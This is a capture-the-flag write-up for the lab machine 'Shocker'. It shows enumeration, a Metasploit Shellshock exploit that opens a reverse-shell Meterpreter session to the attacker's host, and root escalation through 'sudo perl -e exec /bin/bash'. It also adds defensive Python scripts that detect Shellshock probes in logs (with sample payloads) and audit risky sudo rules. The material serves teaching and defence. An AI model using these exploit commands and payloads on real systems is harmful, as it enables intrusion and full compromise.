Shocker Write-Up

  1. Service Enumeration
  2. Further Enumeration
  3. Exploit discovery
  4. Meterpreter
  5. Privesc

Nmap

Nmap reveals open port 80 running Apache httpd 2.4.18 and, further down the output, SSH (OpenSSH 7.2p2) on the non-standard port 2222.

nmap -sC -sV -p-65535 --script vuln 10.10.10.56
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))

..[snipped bunch of false-positives]..

2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)

..[snipped bunch of false-positives]..

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 379.45 seconds

Go to the WebApp:

The application does not reveal much.

Page source:

<body>

<h2>Don't Bug Me!</h2>
<img src="bug.jpg" alt="bug" style="width:450px;height:350px;">

</body>
</html> 

Dirbuster:

The next logical step is to brute-force directories and files in order to find hidden content. Using dirbuster I found a cgi-bin folder and then looked inside it for sensitive files, such as php, sh, txt and pdf.

Shellshock

What is Shellshock? Check this well-written document on the topic: OWASP SHELLSHOCK

Finding and Exploiting Shellshock

msf6 > search shellshock

Matching Modules
================

   #   Name                                               Disclosure Date  Rank       Check  Description
   -   ----                                               ---------------  ----       -----  -----------
   0   auxiliary/scanner/http/apache_mod_cgi_bash_env     2014-09-24       normal     Yes    Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner

The following is the output of the Metasploit scanner module shown above, run against the target URI http://10.10.10.56/cgi-bin/user.sh:

msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > exploit

[+] uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Searching for a suitable Shellshock exploit:

msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > search shellshock

Matching Modules
================

   #   Name                                               Disclosure Date  Rank       Check  Description
   -   ----                                               ---------------  ----       -----  -----------
   0   auxiliary/scanner/http/apache_mod_cgi_bash_env     2014-09-24       normal     Yes    Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
   1   auxiliary/server/dhclient_bash_env                 2014-09-24       normal     No     DHCP Client Bash Environment Variable Code Injection (Shellshock)
   2   exploit/linux/http/advantech_switch_bash_env_exec  2015-12-01       excellent  Yes    Advantech Switch Bash Environment Variable Code Injection (Shellshock)
   3   exploit/linux/http/ipfire_bashbug_exec             2014-09-29       excellent  Yes    IPFire Bash Environment Variable Injection (Shellshock)
   4   exploit/multi/ftp/pureftpd_bash_env_exec           2014-09-24       excellent  Yes    Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)
   5   exploit/multi/http/apache_mod_cgi_bash_env_exec    2014-09-24       excellent  Yes    Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
   6   exploit/multi/http/cups_bash_env_exec              2014-09-24       excellent  Yes    CUPS Filter Bash Environment Variable Code Injection (Shellshock)
   7   exploit/multi/misc/legend_bot_exec                 2015-04-27       excellent  Yes    Legend Perl IRC Bot Remote Code Execution
   8   exploit/multi/misc/xdh_x_exec                      2015-12-04       excellent  Yes    Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution
   9   exploit/osx/local/vmware_bash_function_root        2014-09-24       normal     Yes    OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock)
   10  exploit/unix/dhcp/bash_environment                 2014-09-24       excellent  No     Dhclient Bash Environment Variable Injection (Shellshock)
   11  exploit/unix/smtp/qmail_bash_env_exec              2014-09-24       normal     No     Qmail SMTP Bash Environment Variable Injection (Shellshock)

Interact with a module by name or index. For example info 11, use 11 or use exploit/unix/smtp/qmail_bash_env_exec

Using the show info command I found a suitable exploit for our case:

msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > show info 5

       Name: Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
     Module: exploit/multi/http/apache_mod_cgi_bash_env_exec
   Platform: 
       Arch: 
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2014-09-24

Provided by:
  Stephane Chazelas
  wvu <[email protected]>
  juan vazquez <[email protected]>
  lcamtuf

Available targets:
  Id  Name
  --  ----
  0   Linux x86
  1   Linux x86_64

*(removed some info)*

Payload information:
  Space: 2048

Description:
  This module exploits the Shellshock vulnerability, a flaw in how the 
  Bash shell handles external environment variables. This module 
  targets CGI scripts in the Apache web server by setting the 
  HTTP_USER_AGENT environment variable to a malicious function 
  definition.

References:
  https://cvedetails.com/cve/CVE-2014-6271/
  https://cvedetails.com/cve/CVE-2014-6278/
  https://cwe.mitre.org/data/definitions/94.html
  OSVDB (112004)
  https://www.exploit-db.com/exploits/34765
  https://access.redhat.com/articles/1200223
  https://seclists.org/oss-sec/2014/q3/649

Also known as:
  Shellshock
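
The module description above also tells a defender what the attack looks like on the wire: the User-Agent header becomes a Bash function definition, which mod_cgi exports to the script as HTTP_USER_AGENT. The same property makes the attempt easy to spot in the web server's logs. The Python script below is an added example written for this write-up, not code from the original post or from Metasploit; it parses Apache combined-format access-log lines and flags any whose User-Agent, Referer or request line carries the "() {" signature, percent-decoding first so URL-encoded probes are caught too. The lines in SAMPLE_LOG and the addresses in them are constructed.

```python
"""Shellshock probe detection over Apache "combined" access-log lines.

Added example, not part of the write-up. The Metasploit module sends a CGI
request whose User-Agent is a Bash function definition; mod_cgi copies that
header into the HTTP_USER_AGENT environment variable and a vulnerable Bash
executes what follows the definition. On the server the attempt leaves a
tell-tale "() {" in the logged User-Agent (or Referer, or the request line).
"""
import re
from urllib.parse import unquote

# Apache "combined" format. Quoted fields may contain backslash-escaped
# quotes, so each is matched with (?:[^"\\]|\\.)* rather than [^"]*.
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)

# Bash treats an environment variable whose value begins with "() {" as a
# function definition; whitespace between the tokens is optional.
SHELLSHOCK = re.compile(r"\(\)\s*\{")

# Constructed sample: one User-Agent probe, one URL-encoded probe in the
# query string, one probe in the Referer and two benign requests.
SAMPLE_LOG = [
    '10.0.0.5 - - [07/Apr/2021:10:02:11 -0400] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "() { :;}; echo probe"',
    '10.0.0.7 - - [07/Apr/2021:10:02:30 -0400] "GET /index.html HTTP/1.1" 200 137 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.9 - - [07/Apr/2021:10:03:02 -0400] "GET /cgi-bin/user.sh?%28%29%20%7B%20%3A%3B%7D%3B%20echo%20probe HTTP/1.1" 500 0 "-" "curl/7.68.0"',
    '10.0.0.7 - - [07/Apr/2021:10:03:40 -0400] "GET /bug.jpg HTTP/1.1" 200 51234 "http://example.test/" "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.5 - - [07/Apr/2021:10:04:00 -0400] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "() {:;}; echo probe" "curl/7.68.0"',
]


def parse_line(line):
    """Return the combined-log fields as a dict, or None if the line does
    not parse (truncated writes, rotated-log junk)."""
    m = COMBINED.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def shellshock_hits(lines):
    """Return (client_ip, field, request_line) for each line whose
    User-Agent, Referer or request line carries the "() {" signature.

    Fields are percent-decoded before matching so "%28%29%20%7B" is caught.
    The request line is checked as well because CGI also exports the query
    string to the script's environment (QUERY_STRING), not only the headers.
    """
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for field in ("ua", "referer", "request"):
            if SHELLSHOCK.search(unquote(rec[field])):
                hits.append((rec["ip"], field, rec["request"]))
                break  # one finding per line is enough for alerting
    return hits


def count_by_ip(hits):
    """Aggregate findings per source address, handy for a block-list."""
    counts = {}
    for ip, _field, _request in hits:
        counts[ip] = counts.get(ip, 0) + 1
    return counts


if __name__ == "__main__":
    for ip, field, request in shellshock_hits(SAMPLE_LOG):
        print(f"{ip}\t{field}\t{request}")
```

Run it against a real access.log by replacing SAMPLE_LOG with the file's lines; a hit on a host that still serves CGI scripts from an unpatched Bash is the condition the scanner module above confirms.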

Next, I select the exploit, set the required options and run it, which results in a Meterpreter session.

msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set TARGETURI http://10.10.10.56/cgi-bin/user.sh
TARGETURI => http://10.10.10.56/cgi-bin/user.sh
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > exploit

[*] Started reverse TCP handler on 10.10.14.4:1234 
[*] Command Stager progress - 100.46% done (1097/1092 bytes)
[*] Sending stage (980808 bytes) to 10.10.10.56
[*] Meterpreter session 1 opened (10.10.14.4:1234 -> 10.10.10.56:57692) at 2021-04-07 10:02:11 -0400

In the following section I check which user I am logged in as, change to that user's home directory and list its files, finding the user flag. In this case I was somewhat lucky to check the sudoers configuration (sudo -l) for misconfigurations as the very first thing. Finally, we can privesc with perl.

meterpreter > shell
Process 1530 created.
Channel 1 created.
ls
user.sh
whoami
shelly

cd

ls
user.txt

cat user.txt
3b52250728977779d192b0262d2c2d7e

sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl

sudo perl -e 'exec "/bin/bash"'

whoami
root

cd /root/

ls
root.txt

cat root.txt
f77dc0ce91af01ad16326409e1d05b68
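
The sudoers rule that makes this privesc possible, (root) NOPASSWD: /usr/bin/perl, is exactly the kind of entry a periodic audit should catch before an attacker does. The Python script below is an added example, not part of the write-up: it parses the rule section of sudo -l output in the format shown above and flags rules that let the user run, as root or as ALL, a binary able to spawn a shell or write arbitrary files. SAMPLE_SUDO_L is constructed, modelled on the output above with two extra rules, and SHELL_CAPABLE is an assumed, non-exhaustive list.

```python
"""Audit `sudo -l` output for rules that are effectively root.

Added example, not part of the write-up. The privesc above works because
shelly may run /usr/bin/perl as root without a password and perl can exec a
shell. This script parses the "may run the following commands" section of
`sudo -l` and flags rules that run, as root or as ALL, a binary that can be
turned into a shell. The sample output and the SHELL_CAPABLE list are
constructed for this example; the list is a starting point, not exhaustive.
"""
import os
import re

# Interpreters, editors and file utilities that can be turned into a root
# shell or a root-owned file write when run via sudo (assumed list).
SHELL_CAPABLE = {
    "perl", "python", "python2", "python3", "ruby", "php", "node", "lua",
    "bash", "sh", "dash", "zsh", "vi", "vim", "nano", "less", "more", "awk",
    "find", "env", "tee", "cp", "mv", "chmod", "chown", "tar", "zip",
}

# One sudo rule line:  (runas_user[ : runas_group]) [TAG: ...] cmd[, cmd...]
RULE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+?)\s*$"
)

# Constructed sample in the format sudo prints; the first rule mirrors the
# one found on the box, the other two are made up for contrast.
SAMPLE_SUDO_L = """\
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass
User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
    (root) /usr/bin/apt-get update, /usr/bin/systemctl restart apache2
    (www-data) NOPASSWD: /usr/bin/python3
"""


def parse_sudo_l(text):
    """Return (runas_user, tags, command) triples from `sudo -l` output.

    Commands are split on ", "; sudo escapes a literal comma inside a
    command as "\\,", which this simplified splitter does not handle.
    """
    rules = []
    in_rules = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE.match(line)
        if not m:
            continue
        runas_user = m.group("runas").split(":")[0].strip()
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        for cmd in m.group("cmds").split(", "):
            rules.append((runas_user, tags, cmd.strip()))
    return rules


def risky_rules(rules):
    """Return (command, severity, reason) for rules that amount to root."""
    findings = []
    for runas, tags, cmd in rules:
        if runas not in ("root", "ALL"):
            continue
        if cmd == "ALL":
            reason = "unrestricted command"
        elif os.path.basename(cmd.split()[0]) in SHELL_CAPABLE:
            reason = "shell-capable binary"
        else:
            continue
        # Without NOPASSWD the user's own password still suffices, so the
        # rule is only one notch less severe.
        severity = "critical" if "NOPASSWD" in tags else "high"
        findings.append((cmd, severity, reason))
    return findings


if __name__ == "__main__":
    for cmd, severity, reason in risky_rules(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"{severity}\t{cmd}\t{reason}")
```

Feed it the output of sudo -l for each account on a host (or the expanded rules from sudo -U user -l) and anything it reports as critical is a one-liner away from root, as the perl exec above shows.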
